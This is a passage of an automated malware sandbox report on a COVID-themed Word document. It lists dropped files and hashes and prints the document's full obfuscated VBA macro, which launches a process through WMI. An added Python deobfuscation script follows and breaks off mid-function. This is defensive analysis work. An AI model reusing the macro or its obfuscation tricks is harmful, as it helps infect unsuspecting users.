                      SHA-256:A7025C15BBD7A8393D83B6C7AADDC266A589383C76A6C9A3F4095F28FF89213E
                      SHA-512:24EAB918AA1E67DD52173FE047EDCC327C138B8C9A07352C28691C20470E743B6EDA22EFE48AEAA7A50001355E99407C2E6BB7AFACE29C8B7EC1644EB5E5E5DB
                      Malicious:false
                      Preview: L..................F.... ....S...{...S...{...|..d....x...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..x..-R.# .XP-974~1.DOC..t.......Q.y.Q.y*...8.....................X.P.-.9.7.4.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\XP-9743 Medical report COVID-19.doc.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.X.P.-.9.7.4.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):131
                      Entropy (8bit):5.033583001902089
                      Encrypted:false
                      SSDEEP:3:M1X4WztELQSjmIfFu4olfiWztELQSjmIfFu4omX1X4WztELQSjmIfFu4ov:MDELyIfjufrELyIfjNELyIfjy
                      MD5:704CBC7C6FF8908BC5C52CE42F4761B5
                      SHA1:5D1240BCC4954C9A5BBE7F8E5DFF3395536CE3BB
                      SHA-256:53B0E81D3E027793CE23B9E4393A9FDDBCC24D1FFEE1ECC4661FD6C0079EAA25
                      SHA-512:1720DCF3868389BC3C9280DFA018385A4AE383B1A84680BBA3B4BFC70AEFBDA6EA3C8A5F04DA75144B47EDFFA0913180C032488018F9A4915B04D159528D1974
                      Malicious:false
                      Preview: [doc]..XP-9743 Medical report COVID-19.LNK=0..XP-9743 Medical report COVID-19.LNK=0..[doc]..XP-9743 Medical report COVID-19.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFVIB84821J1PYPBOEY5.temp
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):8016
                      Entropy (8bit):3.586617243298514
                      Encrypted:false
                      SSDEEP:96:chQCsMqftMqvsqvJCwolz8hQCsMqftMqvsEHyqvJCwor/z1PYftJHyf8Iht+lUVJ:cy3olz8y7Hnor/z1bf8IBIu
                      MD5:5CC20A1959F6110E368E14FCE4C71E93
                      SHA1:17DCB465855248585EDE81A4B56D045B043B1BE7
                      SHA-256:8E444E6BEFE6AFC6A1041D54AC7D9290E2595EF93BAD5E4D820949E1841117E1
                      SHA-512:A415E620A9357D9F6D239887EACB0CAD8E5907F8CE29247D098526362650E80D7F18B0D5FE6D13351E563CD2F5EAEFC8F70CD26AE915EC7C8CDABCCBE2409BC5
                      Malicious:false
                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                      C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):340824
                      Entropy (8bit):4.347471014428068
                      Encrypted:false
                      SSDEEP:3072:aG9ctfNneahaNfjraHoEkApi23X5TKavlyw8W8:aG+Fe17mHoU/3NywH8
                      MD5:A675444E1D39C57D28ACE66CCDF56209
                      SHA1:B40E2B76AFE537083B4F024594A262238B7733CC
                      SHA-256:EC2A858FF4D3505EADEEB514A91ED38D34D80A81723DD48F8049A1E963C3587C
                      SHA-512:8CC242A9310AB3F25EB46453FAD48475ED2AA0E7EC0AD141C01339335B8905DF1578F14EBEB318EDF90014ECA794438C8CF1F2704549943056C00E6D587BD502
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.._...........!...2.F...........!.......`...............................`...............................................p..d.......................X....P......................................................xr...............................text....C.......D.................. ..`.rdata.......`.......H..............@..@.data........p.......J..............@....text4...............T..............@....text5..d....@...................... ..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic, Author: Ambre Vidal, Template: Normal.dotm, Last Saved By: Ethan Vasseur, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 17:56:00 2021, Last Saved Time/Date: Tue Jan 12 17:57:00 2021, Number of Pages: 1, Number of Words: 2466, Number of Characters: 14061, Security: 8
                      Entropy (8bit):6.693119364534795
                      TrID:
                      • Microsoft Word document (32009/1) 79.99%
                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                      File name:XP-9743 Medical report COVID-19.doc
                      File size:160861
                      MD5:da92c55d4b08367fb79a6bc6ae4da985
                      SHA1:8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
                      SHA256:137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61
                      SHA512:9ef0222dd48f94d149e090f17ab465389d489eefd5b4cad14867aa1bb5bbd4ca4af1a0d88ab62d74a90c3dbdb906cabdd823cd8105516a9b19fe642005f17e92
                      SSDEEP:3072:EX9ufstRUUKSns8T00JSHUgteMJ8qMD7g8NtP:69ufsfgIf0pL8PP
                      File Content Preview:........................>......................................................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4eea2aaa4b4b4a4

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "XP-9743 Medical report COVID-19.doc"

                      Indicators

                      Has Summary Info:True
                      Application Name:Microsoft Office Word
                      Encrypted Document:False
                      Contains Word Document Stream:True
                      Contains Workbook/Book Stream:False
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Code Page:1252
                      Title:
                      Subject:Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic
                      Author:Ambre Vidal
                      Keywords:
                      Comments:
                      Template:Normal.dotm
                      Last Saved By:Ethan Vasseur
                      Revision Number:1
                      Total Edit Time:0
                      Create Time:2021-01-12 17:56:00
                      Last Saved Time:2021-01-12 17:57:00
                      Number of Pages:1
                      Number of Words:2466
                      Number of Characters:14061
                      Creating Application:Microsoft Office Word
                      Security:8

                      Document Summary

                      Document Code Page:-535
                      Number of Lines:117
                      Number of Paragraphs:32
                      Thumbnail Scaling Desired:False
                      Company:
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:917504

                      Streams with VBA

                      VBA File Name: Gx8fznt8p0b, Stream Size: 10973
                      General
                      Stream Path:Macros/VBA/Gx8fznt8p0b
                      VBA File Name:Gx8fznt8p0b
                      Stream Size:10973
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 14 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 1b 06 00 00 7b 1f 00 00 00 00 00 00 01 00 00 00 0c ff 3a 0a 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      XFTxEQJDN
                      "w]xm[vw]xm[v"
                      gIKrmCJj
                      xSGbCJ
                      dxRvhumeH
                      Fix(dTSeMQG)
                      Fix(zHdGqDLim)
                      (Fix(DqmzWgJHy)
                      RXvmIZQm
                      AiEWeBgBl
                      MSsFhG
                      CXFGDHlI
                      "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                      shylMG
                      reejhCJo:
                      Fix(ZJLnFB)
                      Resume
                      XFTxEQJDN:
                      Fix(CcLHCeb)
                      TMBZGWW
                      (Fix(sJrfKHHt)
                      Fix(neULB)
                      xbIYArN
                      DheYzB
                      HRHrHJDlD
                      MwLbBJBFI
                      NhxAGvAH
                      YjbuICHY
                      Len(dsfe))),
                      ulfWCCiFF
                      WJzJI
                      kshfoytP:
                      Fix(RXvmIZQm)
                      cuCYC
                      Fix(ZYHZlIii)
                      JfXdCsEp
                      InptugrzA
                      Fix(gIKrmCJj)
                      Fix(kshfoytP)
                      JSrfhd:
                      Fix(JfXdCsEp)
                      MiKCE
                      Fix(PNjoAGP)
                      gpIBBDhi
                      JfXdCsEp:
                      Fix(nYjBpD)
                      Fix(sJrfKHHt)
                      UYbmGGDC
                      QKtUz
                      Fix(QKtUz)
                      SetWuCGdA
                      RXvmIZQm:
                      Fix(RXzua)
                      Fix(QWDldHHR)
                      Fix(BzbdEl)
                      TgbVU
                      tqIkDIrD
                      nYjBpD
                      Fix(shylMG)
                      dTSeMQG
                      DJlZDCM
                      "w]xm[v",
                      rvmetA
                      ykgfGkNf
                      Fix(XFTxEQJDN)
                      (Fix(cYdfo)
                      Fix(fRfgHB)
                      Fix(JSrfhd)
                      NfAUFNI
                      CcLHCeb
                      eEAOBGE
                      FBkjB
                      reejhCJo
                      mZXJjJAgq
                      aDUvJDOI:
                      cYdfo
                      zHdGqDLim
                      sJrfKHHt
                      iKSwBkUWG
                      PNjoAGP:
                      RXzua
                      aDUvJDOI
                      (Fix(dTSeMQG)
                      neULB:
                      lmdMEA
                      Fix(cYdfo)
                      vRYIMlBHH
                      UnYMEIiCD
                      Fix(DqmzWgJHy)
                      dNfeF
                      PNjoAGP
                      tYFukEBCC
                      xSGbCJ:
                      "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                      ElseIf
                      (Fix(fRfgHB)
                      UDFpCBJJ
                      (Fix(zHdGqDLim)
                      Fix(reejhCJo)
                      SgwfJAm
                      JSrfhd
                      OkSpwDa
                      QWDldHHR
                      ZYHZlIii:
                      Fix(xSGbCJ)
                      SrmTEEB
                      QWDldHHR:
                      vEHmFIM
                      (Fix(tYFukEBCC)
                      bONvDCElF
                      jzjFFpDhA
                      ggGVJ
                      fRfgHB
                      (Fix(PgRakD)
                      xTZpYXiBF
                      iTfwbHGDH
                      (Fix(CcLHCeb)
                      dUNUgHJG
                      Error
                      THkIAUF
                      kshfoytP
                      MybcQH
                      zCXyyY
                      Fix(AiEWeBgBl)
                      Attribute
                      Fix(aDUvJDOI)
                      GlHkEN
                      gpBWaEPFj
                      Fix(PgRakD)
                      fZVmJ
                      oaACDga
                      szALCGBF
                      (Fix(QKtUz)
                      Fix(tYFukEBCC)
                      VB_Name
                      ICwOHad
                      llWECD
                      (Fix(bONvDCElF)
                      PgRakD
                      gIKrmCJj:
                      (Fix(RXzua)
                      Fix(zKEHRtJGG)
                      Fix(DJlZDCM)
                      Function
                      hzXmmAn
                      Fix(bONvDCElF)
                      BzbdEl:
                      PohBnF
                      GdxqnN
                      DJlZDCM:
                      sTlFD
                      rUIOAx
                      shylMG:
                      VDhTuRJ
                      Double
                      neULB
                      GDDUGJd
                      BzbdEl
                      zKEHRtJGG
                      GqPOTjZ
                      BhhWnCHb
                      CuCzGCw
                      (Fix(nYjBpD)
                      aEWwP
                      nDpnHa
                      ZJLnFB
                      "w]xm[vpw]xm[v"
                      ZYHZlIii
                      (Fix(AiEWeBgBl)
                      Mid(Application.Name,
                      DqmzWgJHy
                      (Fix(zKEHRtJGG)
                      cMaNE
                      (Fix(ZJLnFB)
                      VBA Code
                      Attribute VB_Name = "Gx8fznt8p0b"
                      Function Bn2p1rxokklh_9o8()
                      On Error Resume Next
                      Ypgqgc4wnez0kz = Xaem5y61ivq
                      dsfe = Hj9iyfe3bvb + Kyl0l3rqw280c6ssa.StoryRanges(wdMainTextStory) + Xrsb1iydy1_t2h
                         GoTo BzbdEl
                      Set CuCzGCw = ykgfGkNf
                          Dim BhhWnCHb As Double
                          BhhWnCHb = Fix(BzbdEl)
                          If BhhWnCHb <> BzbdEl Then Exit Function
                          Dim sJrfKHHt As Double
                          sJrfKHHt = BhhWnCHb ^ (1 / 3)
                          If Fix(sJrfKHHt) ^ 3 = BhhWnCHb Then
                              iKSwBkUWG = True
                          ElseIf (Fix(sJrfKHHt) + 1) ^ 3 = BhhWnCHb Then
                              iKSwBkUWG = True
                          End If
                      BzbdEl:
                      g42 = "w]xm[vpw]xm[v"
                      Nux0owfnim4 = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                         GoTo JfXdCsEp
                      Set xTZpYXiBF = mZXJjJAgq
                          Dim DheYzB As Double
                          DheYzB = Fix(JfXdCsEp)
                          If DheYzB <> JfXdCsEp Then Exit Function
                          Dim fRfgHB As Double
                          fRfgHB = DheYzB ^ (1 / 3)
                          If Fix(fRfgHB) ^ 3 = DheYzB Then
                              cMaNE = True
                          ElseIf (Fix(fRfgHB) + 1) ^ 3 = DheYzB Then
                              cMaNE = True
                          End If
                      JfXdCsEp:
                      Tkegc8hi7tjrwtr9oa = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
                         GoTo DJlZDCM
                      Set TgbVU = MSsFhG
                          Dim NfAUFNI As Double
                          NfAUFNI = Fix(DJlZDCM)
                          If NfAUFNI <> DJlZDCM Then Exit Function
                          Dim tYFukEBCC As Double
                          tYFukEBCC = NfAUFNI ^ (1 / 3)
                          If Fix(tYFukEBCC) ^ 3 = NfAUFNI Then
                              MwLbBJBFI = True
                          ElseIf (Fix(tYFukEBCC) + 1) ^ 3 = NfAUFNI Then
                              MwLbBJBFI = True
                          End If
                      DJlZDCM:
                      Aquvchbfc1s = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                         GoTo QWDldHHR
                      Set UnYMEIiCD = VDhTuRJ
                          Dim hzXmmAn As Double
                          hzXmmAn = Fix(QWDldHHR)
                          If hzXmmAn <> QWDldHHR Then Exit Function
                          Dim AiEWeBgBl As Double
                          AiEWeBgBl = hzXmmAn ^ (1 / 3)
                          If Fix(AiEWeBgBl) ^ 3 = hzXmmAn Then
                              jzjFFpDhA = True
                          ElseIf (Fix(AiEWeBgBl) + 1) ^ 3 = hzXmmAn Then
                              jzjFFpDhA = True
                          End If
                      QWDldHHR:
                      Wut_mfci5kk4lb = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"
                         GoTo reejhCJo
                      Set TMBZGWW = FBkjB
                          Dim eEAOBGE As Double
                          eEAOBGE = Fix(reejhCJo)
                          If eEAOBGE <> reejhCJo Then Exit Function
                          Dim cYdfo As Double
                          cYdfo = eEAOBGE ^ (1 / 3)
                          If Fix(cYdfo) ^ 3 = eEAOBGE Then
                              tqIkDIrD = True
                          ElseIf (Fix(cYdfo) + 1) ^ 3 = eEAOBGE Then
                              tqIkDIrD = True
                          End If
                      reejhCJo:
                      Kj4qbrmlwd2552l4 = Aquvchbfc1s + Wut_mfci5kk4lb + Tkegc8hi7tjrwtr9oa + g42 + Nux0owfnim4
                         GoTo PNjoAGP
                      Set OkSpwDa = ICwOHad
                          Dim lmdMEA As Double
                          lmdMEA = Fix(PNjoAGP)
                          If lmdMEA <> PNjoAGP Then Exit Function
                          Dim ZJLnFB As Double
                          ZJLnFB = lmdMEA ^ (1 / 3)
                          If Fix(ZJLnFB) ^ 3 = lmdMEA Then
                              fZVmJ = True
                          ElseIf (Fix(ZJLnFB) + 1) ^ 3 = lmdMEA Then
                              fZVmJ = True
                          End If
                      PNjoAGP:
                      Ls12h2gypqhb = Ipls8rqp952u2lk1(Kj4qbrmlwd2552l4)
                         GoTo shylMG
                      Set cuCYC = GlHkEN
                          Dim THkIAUF As Double
                          THkIAUF = Fix(shylMG)
                          If THkIAUF <> shylMG Then Exit Function
                          Dim CcLHCeb As Double
                          CcLHCeb = THkIAUF ^ (1 / 3)
                          If Fix(CcLHCeb) ^ 3 = THkIAUF Then
                              rvmetA = True
                          ElseIf (Fix(CcLHCeb) + 1) ^ 3 = THkIAUF Then
                              rvmetA = True
                          End If
                      shylMG:
                      Set Sy6vvpgixx8z_5f = CreateObject(Ls12h2gypqhb)
                         GoTo neULB
                      Set gpBWaEPFj = nDpnHa
                          Dim aEWwP As Double
                          aEWwP = Fix(neULB)
                          If aEWwP <> neULB Then Exit Function
                          Dim PgRakD As Double
                          PgRakD = aEWwP ^ (1 / 3)
                          If Fix(PgRakD) ^ 3 = aEWwP Then
                              PohBnF = True
                          ElseIf (Fix(PgRakD) + 1) ^ 3 = aEWwP Then
                              PohBnF = True
                          End If
                      neULB:
                         GoTo aDUvJDOI
                      Set gpIBBDhi = SgwfJAm
                          Dim ulfWCCiFF As Double
                          ulfWCCiFF = Fix(aDUvJDOI)
                          If ulfWCCiFF <> aDUvJDOI Then Exit Function
                          Dim bONvDCElF As Double
                          bONvDCElF = ulfWCCiFF ^ (1 / 3)
                          If Fix(bONvDCElF) ^ 3 = ulfWCCiFF Then
                              MybcQH = True
                          ElseIf (Fix(bONvDCElF) + 1) ^ 3 = ulfWCCiFF Then
                              MybcQH = True
                          End If
                      aDUvJDOI:
                         GoTo xSGbCJ
                      Set WJzJI = GqPOTjZ
                          Dim UYbmGGDC As Double
                          UYbmGGDC = Fix(xSGbCJ)
                          If UYbmGGDC <> xSGbCJ Then Exit Function
                          Dim nYjBpD As Double
                          nYjBpD = UYbmGGDC ^ (1 / 3)
                          If Fix(nYjBpD) ^ 3 = UYbmGGDC Then
                              HRHrHJDlD = True
                          ElseIf (Fix(nYjBpD) + 1) ^ 3 = UYbmGGDC Then
                              HRHrHJDlD = True
                          End If
                      xSGbCJ:
                      Sy6vvpgixx8z_5f.Create Ipls8rqp952u2lk1(Mid(dsfe, (1 + 4), Len(dsfe))), Vc1971csmq7a5g9, W7x42qfm4_lw
                         GoTo kshfoytP
                      Set ggGVJ = dUNUgHJG
                          Dim oaACDga As Double
                          oaACDga = Fix(kshfoytP)
                          If oaACDga <> kshfoytP Then Exit Function
                          Dim RXzua As Double
                          RXzua = oaACDga ^ (1 / 3)
                          If Fix(RXzua) ^ 3 = oaACDga Then
                              dxRvhumeH = True
                          ElseIf (Fix(RXzua) + 1) ^ 3 = oaACDga Then
                              dxRvhumeH = True
                          End If
                      kshfoytP:
                         GoTo ZYHZlIii
                      Set sTlFD = SetWuCGdA
                          Dim CXFGDHlI As Double
                          CXFGDHlI = Fix(ZYHZlIii)
                          If CXFGDHlI <> ZYHZlIii Then Exit Function
                          Dim QKtUz As Double
                          QKtUz = CXFGDHlI ^ (1 / 3)
                          If Fix(QKtUz) ^ 3 = CXFGDHlI Then
                              dNfeF = True
                          ElseIf (Fix(QKtUz) + 1) ^ 3 = CXFGDHlI Then
                              dNfeF = True
                          End If
                      ZYHZlIii:
                      End Function
                      Function Ipls8rqp952u2lk1(V8_prqa_b590f6uz6z)
                      On Error Resume Next
                         GoTo JSrfhd
                      Set llWECD = zCXyyY
                          Dim xbIYArN As Double
                          xbIYArN = Fix(JSrfhd)
                          If xbIYArN <> JSrfhd Then Exit Function
                          Dim zHdGqDLim As Double
                          zHdGqDLim = xbIYArN ^ (1 / 3)
                          If Fix(zHdGqDLim) ^ 3 = xbIYArN Then
                              iTfwbHGDH = True
                          ElseIf (Fix(zHdGqDLim) + 1) ^ 3 = xbIYArN Then
                              iTfwbHGDH = True
                          End If
                      JSrfhd:
                      Hvdntqk_ku4y1u_ = V8_prqa_b590f6uz6z
                         GoTo XFTxEQJDN
                      Set vRYIMlBHH = szALCGBF
                          Dim vEHmFIM As Double
                          vEHmFIM = Fix(XFTxEQJDN)
                          If vEHmFIM <> XFTxEQJDN Then Exit Function
                          Dim dTSeMQG As Double
                          dTSeMQG = vEHmFIM ^ (1 / 3)
                          If Fix(dTSeMQG) ^ 3 = vEHmFIM Then
                              MiKCE = True
                          ElseIf (Fix(dTSeMQG) + 1) ^ 3 = vEHmFIM Then
                              MiKCE = True
                          End If
                      XFTxEQJDN:
                      Xz0p6qe4s08b07kkt = Cws3jiyt47ovpsrhug(Hvdntqk_ku4y1u_)
                         GoTo RXvmIZQm
                      Set GDDUGJd = YjbuICHY
                          Dim GdxqnN As Double
                          GdxqnN = Fix(RXvmIZQm)
                          If GdxqnN <> RXvmIZQm Then Exit Function
                          Dim DqmzWgJHy As Double
                          DqmzWgJHy = GdxqnN ^ (1 / 3)
                          If Fix(DqmzWgJHy) ^ 3 = GdxqnN Then
                              NhxAGvAH = True
                          ElseIf (Fix(DqmzWgJHy) + 1) ^ 3 = GdxqnN Then
                              NhxAGvAH = True
                          End If
                      RXvmIZQm:
                      Ipls8rqp952u2lk1 = Xz0p6qe4s08b07kkt
                         GoTo gIKrmCJj
                      Set InptugrzA = rUIOAx
                          Dim UDFpCBJJ As Double
                          UDFpCBJJ = Fix(gIKrmCJj)
                          If UDFpCBJJ <> gIKrmCJj Then Exit Function
                          Dim zKEHRtJGG As Double
                          zKEHRtJGG = UDFpCBJJ ^ (1 / 3)
                          If Fix(zKEHRtJGG) ^ 3 = UDFpCBJJ Then
                              SrmTEEB = True
                          ElseIf (Fix(zKEHRtJGG) + 1) ^ 3 = UDFpCBJJ Then
                              SrmTEEB = True
                          End If
                      gIKrmCJj:
                      End Function
                      Function Cws3jiyt47ovpsrhug(Mhb7dz_hsybhf0ic7)
                      Cws3jiyt47ovpsrhug = Replace(Mhb7dz_hsybhf0ic7, "w]xm[v", H1kcw0gko9w6ta3y)
                      End Function
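How the macro above assembles its strings deserves a worked illustration. Every real statement of Bn2p1rxokklh_9o8() is followed by a `GoTo label` that jumps over a block of cube-root arithmetic, so that code never executes; the strings themselves are literals with the delimiter `w]xm[v` sprinkled in, and Cws3jiyt47ovpsrhug() removes it with `Replace(..., "w]xm[v", H1kcw0gko9w6ta3y)`, where H1kcw0gko9w6ta3y is never assigned and therefore evaluates to an empty string. Once the delimiter is gone, the five fragments concatenate to the WMI moniker handed to `CreateObject`, and the Win32_Process.Create argument is the document body (`StoryRanges(wdMainTextStory)`) minus its first four characters, decoded the same way. The following Python script is an added example written for this report, not code from the sample or from the sandbox; it copies the live statements from the dump above, assumes that Word's `Application.Name` returns "Microsoft Word" (so `Mid(Application.Name, 6, 1)` is "s"), and uses a constructed placeholder for the document body text, which this page does not reproduce.

```python
import re

# Delimiter that Cws3jiyt47ovpsrhug() removes with Replace(). Its replacement argument,
# H1kcw0gko9w6ta3y, is never assigned; without Option Explicit VBA treats it as Empty ("").
JUNK = "w]xm[v"

# Assumption: Word's Application.Name property is "Microsoft Word", so
# Mid(Application.Name, 4 + 2, 2 - 1) = Mid("Microsoft Word", 6, 1) = "s".
APPLICATION_NAME = "Microsoft Word"

# Live statements of Bn2p1rxokklh_9o8() copied from the macro dump above, plus one of its
# GoTo/label junk blocks so strip_dead_code() has something to remove.
MACRO_EXCERPT = '''
On Error Resume Next
dsfe = Hj9iyfe3bvb + Kyl0l3rqw280c6ssa.StoryRanges(wdMainTextStory) + Xrsb1iydy1_t2h
   GoTo BzbdEl
Set CuCzGCw = ykgfGkNf
    Dim BhhWnCHb As Double
    BhhWnCHb = Fix(BzbdEl)
    If BhhWnCHb <> BzbdEl Then Exit Function
BzbdEl:
g42 = "w]xm[vpw]xm[v"
Nux0owfnim4 = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
Tkegc8hi7tjrwtr9oa = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
Aquvchbfc1s = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
Wut_mfci5kk4lb = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"
Kj4qbrmlwd2552l4 = Aquvchbfc1s + Wut_mfci5kk4lb + Tkegc8hi7tjrwtr9oa + g42 + Nux0owfnim4
Ls12h2gypqhb = Ipls8rqp952u2lk1(Kj4qbrmlwd2552l4)
Set Sy6vvpgixx8z_5f = CreateObject(Ls12h2gypqhb)
Sy6vvpgixx8z_5f.Create Ipls8rqp952u2lk1(Mid(dsfe, (1 + 4), Len(dsfe))), Vc1971csmq7a5g9, W7x42qfm4_lw
'''


def strip_dead_code(vba: str) -> str:
    """Drop each 'GoTo X' jump together with everything up to its 'X:' label.
    The cube-root arithmetic in between is unreachable and exists only to bloat the source."""
    kept, skip_to = [], None
    for line in vba.splitlines():
        stmt = line.strip()
        if skip_to is not None:                 # inside an unreachable region
            if stmt == skip_to + ":":
                skip_to = None
            continue
        jump = re.fullmatch(r"GoTo\s+(\w+)", stmt)
        if jump:
            skip_to = jump.group(1)
            continue
        kept.append(line)
    return "\n".join(kept)


def _vb_int(expr: str) -> int:
    """Evaluate an integer constant such as '4 + 2' or '2 - 1' without eval()."""
    return sum(int(tok.replace(" ", "")) for tok in re.findall(r"[+-]?\s*\d+", expr))


def eval_string_expr(expr: str, env: dict) -> str:
    """Concatenate a VBA '+' expression of string literals, already-resolved variables
    and Mid(Application.Name, ...). Names that were never assigned are Empty ("")."""
    def mid_app(m):
        start, length = _vb_int(m.group(1)), _vb_int(m.group(2))
        return '"' + APPLICATION_NAME[start - 1:start - 1 + length] + '"'
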